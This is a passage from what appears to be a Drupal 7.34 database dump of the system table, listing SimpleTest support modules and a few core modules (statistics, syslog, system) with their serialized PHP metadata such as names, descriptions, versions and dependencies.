testing.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:49:{i:0;s:15:\"simpletest.test\";i:1;s:24:\"drupal_web_test_case.php\";i:2;s:18:\"tests/actions.test\";i:3;s:15:\"tests/ajax.test\";i:4;s:16:\"tests/batch.test\";i:5;s:20:\"tests/bootstrap.test\";i:6;s:16:\"tests/cache.test\";i:7;s:17:\"tests/common.test\";i:8;s:24:\"tests/database_test.test\";i:9;s:22:\"tests/entity_crud.test\";i:10;s:32:\"tests/entity_crud_hook_test.test\";i:11;s:23:\"tests/entity_query.test\";i:12;s:16:\"tests/error.test\";i:13;s:15:\"tests/file.test\";i:14;s:23:\"tests/filetransfer.test\";i:15;s:15:\"tests/form.test\";i:16;s:16:\"tests/graph.test\";i:17;s:16:\"tests/image.test\";i:18;s:15:\"tests/lock.test\";i:19;s:15:\"tests/mail.test\";i:20;s:15:\"tests/menu.test\";i:21;s:17:\"tests/module.test\";i:22;s:16:\"tests/pager.test\";i:23;s:19:\"tests/password.test\";i:24;s:15:\"tests/path.test\";i:25;s:19:\"tests/registry.test\";i:26;s:17:\"tests/schema.test\";i:27;s:18:\"tests/session.test\";i:28;s:20:\"tests/tablesort.test\";i:29;s:16:\"tests/theme.test\";i:30;s:18:\"tests/unicode.test\";i:31;s:17:\"tests/update.test\";i:32;s:17:\"tests/xmlrpc.test\";i:33;s:26:\"tests/upgrade/upgrade.test\";i:34;s:34:\"tests/upgrade/upgrade.comment.test\";i:35;s:33:\"tests/upgrade/upgrade.filter.test\";i:36;s:32:\"tests/upgrade/upgrade.forum.test\";i:37;s:33:\"tests/upgrade/upgrade.locale.test\";i:38;s:31:\"tests/upgrade/upgrade.menu.test\";i:39;s:31:\"tests/upgrade/upgrade.node.test\";i:40;s:35:\"tests/upgrade/upgrade.taxonomy.test\";i:41;s:34:\"tests/upgrade/upgrade.trigger.test\";i:42;s:39:\"tests/upgrade/upgrade.translatable.test\";i:43;s:33:\"tests/upgrade/upgrade.upload.test\";i:44;s:31:\"tests/upgrade/upgrade.user.test\";i:45;s:36:\"tests/upgrade/update.aggregator.test\";i:46;s:33:\"tests/upgrade/update.trigger.test\";i:47;s:31:\"tests/upgrade/update.field.test\";i:48;s:30:\"tests/upgrade/update.user.test\";}s:9:\"configure\";s:41:\"admin/config/development/testing/settings\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/actions_loop_test.module','actions_loop_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:17:\"Actions loop test\";s:11:\"description\";s:39:\"Support module for action loop testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/ajax_forms_test.module','ajax_forms_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:26:\"AJAX form test mock module\";s:11:\"description\";s:25:\"Test for AJAX form calls.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/ajax_test.module','ajax_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:9:\"AJAX Test\";s:11:\"description\";s:40:\"Support module for AJAX framework tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/batch_test.module','batch_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:14:\"Batch API test\";s:11:\"description\";s:35:\"Support module for Batch API tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/common_test.module','common_test','module','',0,0,-1,0,'a:14:{s:4:\"name\";s:11:\"Common Test\";s:11:\"description\";s:32:\"Support module for Common tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:15:\"common_test.css\";s:40:\"modules/simpletest/tests/common_test.css\";}s:5:\"print\";a:1:{s:21:\"common_test.print.css\";s:46:\"modules/simpletest/tests/common_test.print.css\";}}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/common_test_cron_helper.module','common_test_cron_helper','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:23:\"Common Test Cron Helper\";s:11:\"description\";s:56:\"Helper module for CronRunTestCase::testCronExceptions().\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/database_test.module','database_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:13:\"Database Test\";s:11:\"description\";s:40:\"Support module for Database layer tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/drupal_system_listing_compatible_test/drupal_system_listing_compatible_test.module','drupal_system_listing_compatible_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:37:\"Drupal system listing compatible test\";s:11:\"description\";s:62:\"Support module for testing the drupal_system_listing function.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/drupal_system_listing_incompatible_test/drupal_system_listing_incompatible_test.module','drupal_system_listing_incompatible_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:39:\"Drupal system listing incompatible test\";s:11:\"description\";s:62:\"Support module for testing the drupal_system_listing function.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/entity_cache_test.module','entity_cache_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:17:\"Entity cache test\";s:11:\"description\";s:40:\"Support module for testing entity cache.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:28:\"entity_cache_test_dependency\";}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/entity_cache_test_dependency.module','entity_cache_test_dependency','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:28:\"Entity cache test dependency\";s:11:\"description\";s:51:\"Support dependency module for testing entity cache.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/entity_crud_hook_test.module','entity_crud_hook_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:22:\"Entity CRUD Hooks Test\";s:11:\"description\";s:35:\"Support module for CRUD hook tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/entity_query_access_test.module','entity_query_access_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:24:\"Entity query access test\";s:11:\"description\";s:49:\"Support module for checking entity query results.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/error_test.module','error_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:10:\"Error test\";s:11:\"description\";s:47:\"Support module for error and exception testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/file_test.module','file_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:9:\"File test\";s:11:\"description\";s:39:\"Support module for file handling tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:16:\"file_test.module\";}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/filter_test.module','filter_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:18:\"Filter test module\";s:11:\"description\";s:33:\"Tests filter hooks and functions.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/form_test.module','form_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:12:\"FormAPI Test\";s:11:\"description\";s:34:\"Support module for Form API tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/image_test.module','image_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:10:\"Image test\";s:11:\"description\";s:39:\"Support module for image toolkit tests.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/menu_test.module','menu_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"Hook menu tests\";s:11:\"description\";s:37:\"Support module for menu hook testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/module_test.module','module_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Module test\";s:11:\"description\";s:41:\"Support module for module system testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/path_test.module','path_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"Hook path tests\";s:11:\"description\";s:37:\"Support module for path hook testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/psr_0_test/psr_0_test.module','psr_0_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:16:\"PSR-0 Test cases\";s:11:\"description\";s:44:\"Test classes to be discovered by simpletest.\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/requirements1_test.module','requirements1_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:19:\"Requirements 1 Test\";s:11:\"description\";s:80:\"Tests that a module is not installed when it fails hook_requirements(\'install\').\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/requirements2_test.module','requirements2_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:19:\"Requirements 2 Test\";s:11:\"description\";s:98:\"Tests that a module is not installed when the one it depends on fails hook_requirements(\'install).\";s:12:\"dependencies\";a:2:{i:0;s:18:\"requirements1_test\";i:1;s:7:\"comment\";}s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/session_test.module','session_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:12:\"Session test\";s:11:\"description\";s:40:\"Support module for session data testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_dependencies_test.module','system_dependencies_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:22:\"System dependency test\";s:11:\"description\";s:47:\"Support module for testing system dependencies.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:12:\"dependencies\";a:1:{i:0;s:19:\"_missing_dependency\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_incompatible_core_version_dependencies_test.module','system_incompatible_core_version_dependencies_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:50:\"System incompatible core version dependencies test\";s:11:\"description\";s:47:\"Support module for testing system dependencies.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:12:\"dependencies\";a:1:{i:0;s:37:\"system_incompatible_core_version_test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_incompatible_core_version_test.module','system_incompatible_core_version_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:37:\"System incompatible core version test\";s:11:\"description\";s:47:\"Support module for testing system dependencies.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"5.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_incompatible_module_version_dependencies_test.module','system_incompatible_module_version_dependencies_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:52:\"System incompatible module version dependencies test\";s:11:\"description\";s:47:\"Support module for testing system dependencies.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:12:\"dependencies\";a:1:{i:0;s:46:\"system_incompatible_module_version_test (>2.0)\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_incompatible_module_version_test.module','system_incompatible_module_version_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:39:\"System incompatible module version test\";s:11:\"description\";s:47:\"Support module for testing system dependencies.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_test.module','system_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"System test\";s:11:\"description\";s:34:\"Support module for system testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:18:\"system_test.module\";}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/taxonomy_test.module','taxonomy_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:20:\"Taxonomy test module\";s:11:\"description\";s:45:\"\"Tests functions and hooks not used in core\".\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:12:\"dependencies\";a:1:{i:0;s:8:\"taxonomy\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/theme_test.module','theme_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:10:\"Theme test\";s:11:\"description\";s:40:\"Support module for theme system testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/update_script_test.module','update_script_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:18:\"Update script test\";s:11:\"description\";s:41:\"Support module for update script testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/update_test_1.module','update_test_1','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Update test\";s:11:\"description\";s:34:\"Support module for update testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/update_test_2.module','update_test_2','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Update test\";s:11:\"description\";s:34:\"Support module for update testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/update_test_3.module','update_test_3','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Update test\";s:11:\"description\";s:34:\"Support module for update testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/url_alter_test.module','url_alter_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"Url_alter tests\";s:11:\"description\";s:45:\"A support modules for url_alter hook testing.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/xmlrpc_test.module','xmlrpc_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:12:\"XML-RPC Test\";s:11:\"description\";s:75:\"Support module for XML-RPC tests according to the validator1 specification.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/statistics/statistics.module','statistics','module','',1,1,7000,0,'a:13:{s:4:\"name\";s:10:\"Statistics\";s:11:\"description\";s:37:\"Logs access statistics for your site.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:15:\"statistics.test\";}s:9:\"configure\";s:30:\"admin/config/system/statistics\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/syslog/syslog.module','syslog','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:6:\"Syslog\";s:11:\"description\";s:41:\"Logs and records system events to syslog.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"syslog.test\";}s:9:\"configure\";s:32:\"admin/config/development/logging\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/system/system.module','system','module','',1,0,7079,0,'a:14:{s:4:\"name\";s:6:\"System\";s:11:\"description\";s:54:\"Handles general site configuration for 